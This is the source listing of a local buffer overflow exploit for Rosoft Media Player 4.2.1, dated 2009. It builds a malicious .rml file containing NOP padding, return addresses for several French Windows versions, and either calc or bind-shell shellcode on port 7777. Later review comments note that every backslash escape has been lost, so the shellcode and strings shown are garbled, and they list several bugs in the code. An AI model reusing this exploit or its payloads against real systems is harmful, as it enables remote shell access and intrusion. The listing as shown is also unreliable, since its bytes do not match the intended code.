# Title : Rosoft Media Player 4.2.1 Local Buffer Overflow Exploit (multi target)
# Published : 2009-03-16
# Author : SimO-s0fT
/* rsmpf.c
* Rosoft media player free local buffer overflow Exploit multi targets
* Coded By :
* SimO-s0fT (Maroc-anti-connexion@hotmail.com)
* thanks To : Stack & fl0 fl0w & SKD
* and special thanks to str0ke for his advice and support ( you are the best brotha )
* example :
* ##########################################################################################
# Coded By SimO-s0fT #
* # 0 [*]Microsoft Windows Trust SP3 (Frensh):ESP #
* # 1 [*]Microsoft Windows Trust SP2 (Frensh):ESP #
* # 2 [*]Microsoft Windows XP SP3 (Frensh) : ESP #
* # 3 [*]Microsoft Windows XP SP2 (Frensh) : ESP #
* # USAGE : #
* # exploit1.exe file.rml platform #
* # more information contact me { Maroc-anti-connexion[at]hotmail[dot]com } #
* # failed...: No such file or directory #
* # C:\Documents and Settings\The Fanopsis\Bureau>exploit1 simo.rml 0 #
* # [1] execute calc.exe #
* # [2] execute bindshell LPORT=7777 #
* # Choose a neumber : 2 #
* # simo.rml has been created! #
* # C:\Documents and Settings\The Fanopsis\Bureau>telnet 41.250.22.124 7777 #
* # Console - Windows Trust 3.0 (Service Pack 3: v55 #
* # #
* # (C) 1985-2008 Microsoft Corp. #
* # #
* # #
* # C:\Documents and Settings\The Fanopsis\Bureau> #
* ##########################################################################################
*
********************************************************************************************************/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#define OFFSET 4096
// Payload #1: "calc" (the author used it to test the exploit).
// NOTE(review): as rendered on this page every escape has lost its backslash
// ("x29xc9" where "\x29\xc9" was clearly intended), so this literal is plain
// ASCII text rather than the intended bytes, and the strlen() calls in main()
// measure that text. The listing as shown is not faithful to the original file.
char scode1[]=
"x29xc9x83xe9xddxd9xeexd9x74x24xf4x5bx81x73x13xa9"
"x21xdbx5bx83xebxfcxe2xf4x55xc9x9fx5bxa9x21x50x1e"
"x95xaaxa7x5exd1x20x34xd0xe6x39x50x04x89x20x30x12"
"x22x15x50x5ax47x10x1bxc2x05xa5x1bx2fxaexe0x11x56"
"xa8xe3x30xafx92x75xffx5fxdcxc4x50x04x8dx20x30x3d"
"x22x2dx90xd0xf6x3dxdaxb0x22x3dx50x5ax42xa8x87x7f"
"xadxe2xeax9bxcdxaax9bx6bx2cxe1xa3x57x22x61xd7xd0"
"xd9x3dx76xd0xc1x29x30x52x22xa1x6bx5bxa9x21x50x33"
"x95x7exeaxadxc9x77x52xa3x2axe1xa0x0bxc1xd1x51x5f"
"xf6x49x43xa5x23x2fx8cxa4x4ex42xbax37xcax0fxbex23"
"xccx21xdbx5b";
// Payload #2: the author labels it a bind shell on LPORT 7777.
// NOTE(review): same rendering problem as scode1 — the backslashes of the
// "\x.." escapes are missing on this page, so the literal is ASCII text here.
char scode2[] =
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x37x49x49x49x49x49x49x49x49x51x5ax6ax61"
"x58x30x42x31x50x42x41x6bx41x41x71x32x41x42x41x32"
"x42x41x30x42x41x58x38x41x42x50x75x6dx39x4bx4cx32"
"x4ax5ax4bx50x4dx6dx38x6bx49x49x6fx59x6fx39x6fx35"
"x30x6cx4bx70x6cx65x74x37x54x4cx4bx42x65x47x4cx6e"
"x6bx31x6cx46x65x33x48x43x31x48x6fx6cx4bx70x4fx65"
"x48x6cx4bx73x6fx35x70x37x71x38x6bx31x59x4cx4bx46"
"x54x6ex6bx53x31x58x6ex30x31x6fx30x4fx69x4ex4cx4b"
"x34x49x50x41x64x46x67x49x51x7ax6ax46x6dx43x31x48"
"x42x5ax4bx38x74x47x4bx30x54x64x64x51x38x42x55x4b"
"x55x4ex6bx53x6fx51x34x43x31x4ax4bx50x66x4ex6bx46"
"x6cx42x6bx4cx4bx73x6fx75x4cx33x31x5ax4bx65x53x34"
"x6cx6ex6bx6dx59x30x6cx57x54x55x4cx55x31x4bx73x74"
"x71x69x4bx65x34x6ex6bx43x73x74x70x6cx4bx67x30x46"
"x6cx6cx4bx70x70x67x6cx6ex4dx6cx4bx57x30x44x48x71"
"x4ex72x48x4ex6ex50x4ex54x4ex38x6cx70x50x4bx4fx4e"
"x36x71x76x41x43x31x76x31x78x76x53x30x32x53x58x30"
"x77x44x33x57x42x63x6fx70x54x6bx4fx48x50x73x58x58"
"x4bx58x6dx6bx4cx57x4bx70x50x6bx4fx6ax76x71x4fx6d"
"x59x4bx55x65x36x6cx41x68x6dx53x38x63x32x42x75x51"
"x7ax36x62x59x6fx58x50x71x78x4ax79x34x49x4bx45x6e"
"x4dx30x57x69x6fx4ex36x52x73x41x43x62x73x76x33x51"
"x43x70x43x43x63x73x73x36x33x6bx4fx4ax70x75x36x41"
"x78x75x4ex71x71x35x36x42x73x4bx39x79x71x6cx55x70"
"x68x4fx54x75x4ax32x50x39x57x52x77x69x6fx38x56x70"
"x6ax72x30x50x51x53x65x4bx4fx58x50x55x38x6cx64x4c"
"x6dx34x6ex49x79x66x37x6bx4fx4ex36x50x53x30x55x69"
"x6fx4ax70x53x58x7ax45x41x59x4ex66x37x39x36x37x69"
"x6fx59x46x72x70x50x54x31x44x33x65x4bx4fx5ax70x4f"
"x63x51x78x38x67x50x79x38x46x43x49x32x77x4bx4fx4b"
"x66x62x75x79x6fx6ax70x45x36x30x6ax52x44x30x66x41"
"x78x32x43x72x4dx6fx79x6dx35x62x4ax42x70x70x59x74"
"x69x5ax6cx6cx49x6bx57x41x7ax32x64x6bx39x68x62x30"
"x31x6fx30x6bx43x6ex4ax6bx4ex51x52x34x6dx49x6ex62"
"x62x36x4cx5ax33x6cx4dx71x6ax65x68x6ex4bx4cx6bx4e"
"x4bx55x38x30x72x59x6ex4cx73x37x66x4bx4fx30x75x63"
"x74x39x6fx6ex36x33x6bx36x37x72x72x31x41x31x41x46"
"x31x50x6ax55x51x31x41x41x41x32x75x42x71x39x6fx48"
"x50x50x68x6cx6dx39x49x45x55x78x4ex30x53x39x6fx6b"
"x66x62x4ax79x6fx39x6fx47x47x39x6fx58x50x4ex6bx50"
"x57x4bx4cx6cx43x4bx74x70x64x6bx4fx6ax76x41x42x49"
"x6fx58x50x30x68x68x6fx6ax6ex4bx50x31x70x42x73x49"
"x6fx58x56x49x6fx78x50x61";
/* Target table: one entry per supported platform label and the address that
 * main() copies (4 bytes of it) into the generated file after the padding.
 * The trailing {NULL} entry only terminates the usage listing loop; it is not a
 * bounds guard — main() indexes this array with atoi(argv[2]) unchecked, so any
 * index outside 0..3 reads past the array. */
struct adresses
{char *platform;
unsigned long addr;
}
systems[]=
{
{"[*]Microsoft Windows Trust SP3 (Frensh):ESP",0x7D60DECB },
{"[*]Microsoft Windows Trust SP2 (Frensh):ESP",0x7C85D569 },
{"[*]Microsoft Windows XP SP3 (Frensh) : ESP" ,0x7E498C6B },
{"[*]Microsoft Windows XP SP2 (Frensh) : ESP" ,0x7C82385D },
{NULL },
};
/* Filler sequences placed before and after the address in the generated file;
 * the author marks NOP1 as not working. NOTE(review): rendered without
 * backslashes on this page, so "x90x90..." is ASCII text here (see scode1). */
char NOP1[]="x90x90x90x90";// n0t working
char NOP2[]="x90x90x90x90x90x90x90x90";
/*
 * Entry point. Writes the file named by argv[1] as: OFFSET bytes of 0x90 filler,
 * bchars, NOP1, the 4-byte address selected by argv[2] from systems[], NOP2, and
 * the payload chosen interactively (1 = scode1, 2 = scode2). Always returns 0.
 *
 * NOTE(review): on this page every escape sequence has lost its backslash
 * ("...s0fTn", "tt", "xF0xFF..."), so the string literals below are not the
 * author's original bytes; the listing is not faithful as rendered.
 */
int main(int argc,char *argv[]){
FILE *s;
unsigned char *buffer;
/* argv[2] is dereferenced here, before argc is checked: with fewer than three
 * arguments this reads a NULL pointer, and the atoi() result is used as an index
 * into systems[] with no range check (out-of-bounds read for anything outside
 * 0..3). atoi() also gives no error indication for non-numeric input. */
unsigned int RET= systems[atoi(argv[2])].addr;
/* 4-byte sequence copied in front of the address. Its role is not stated in the
 * source (the name suggests a "bad chars" marker); presumably filler — verify. */
unsigned char bchars[]="xF0xFFxFDx7F";
int i;
/* Left uninitialised: if scanf() below fails, the switch reads an indeterminate value. */
int number;
int offset=0;
/* The usage branch only prints; it does not return, so with argc < 2 execution
 * continues to fopen(argv[1]) with argv[1] == NULL. argc == 2 is also accepted
 * although argv[2] has already been required above. */
if (argc <2){
system("cls");  /* spawns a command interpreter purely for cosmetics */
printf("Coded By SimO-s0fTn");
for(i=0;systems[i].platform;i++)
printf("%d tt %sn",i,systems[i].platform);
printf("USAGE : nt");
/* Non-literal format string: argv[0] is passed as the format (CERT FIO30-C). */
printf(argv[0]);
printf(".exe ");
printf("file.rml ");
printf("platformn");
printf("more information contact me { Maroc-anti-connexion[at]hotmail[dot]com }n");
}
if ((s=fopen(argv[1],"wb"))==NULL){
perror("failed...");
exit(0);  /* exits with status 0 even though the open failed */
}
printf("[1] execute calc.exen");
printf("[2] execute bindshell LPORT=7777n");
printf(" Choose a neumber : ");
scanf("%d",&number);  /* return value not checked; number stays indeterminate on failure */
/* Cases 1 and 2 are identical apart from the payload array. There is no default
 * case, so any other number leaves s open and the program returns 0 having
 * written nothing. In both cases the malloc() result is not checked before
 * memset()/memcpy(); the allocation is sized exactly to the data and no
 * terminator is appended, yet fputs() expects a NUL-terminated string and so
 * reads past the end of the buffer (undefined behaviour). */
switch(number){
case 1: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode1));
offset=OFFSET;
memcpy(buffer+offset,bchars,strlen(bchars));
offset+=strlen(bchars);
memcpy(buffer+offset,NOP1,strlen(NOP1));
offset+=strlen(NOP1);
/* Copies sizeof-independent 4 bytes of RET; assumes unsigned int is 32-bit on the build host. */
memcpy(buffer+offset,&RET,4);
offset+=4;
memcpy(buffer+offset,NOP2,strlen(NOP2));
offset+=strlen(NOP2);
memcpy(buffer+offset,scode1,strlen(scode1));
offset+=strlen(scode1);
fputs(buffer,s);  /* buffer is not NUL-terminated — see note above the switch */
fclose(s);
printf("%s has been created!",argv[1]);
free(buffer);
break;
case 2: buffer=(unsigned char *) malloc (OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
memset(buffer,0x90,OFFSET+strlen(bchars)+strlen(NOP1)+4+strlen(NOP2)+strlen(scode2));
offset=OFFSET;
memcpy(buffer+offset,bchars,strlen(bchars));
offset+=strlen(bchars);
memcpy(buffer+offset,NOP1,strlen(NOP1));
offset+=strlen(NOP1);
memcpy(buffer+offset,&RET,4);
offset+=4;
memcpy(buffer+offset,NOP2,strlen(NOP2));
offset+=strlen(NOP2);
memcpy(buffer+offset,scode2,strlen(scode2));
offset+=strlen(scode2);
fputs(buffer,s);  /* same unterminated-buffer read as case 1 */
fclose(s);
printf("%s has been created!",argv[1]);
free(buffer);
break;
}
return 0;
}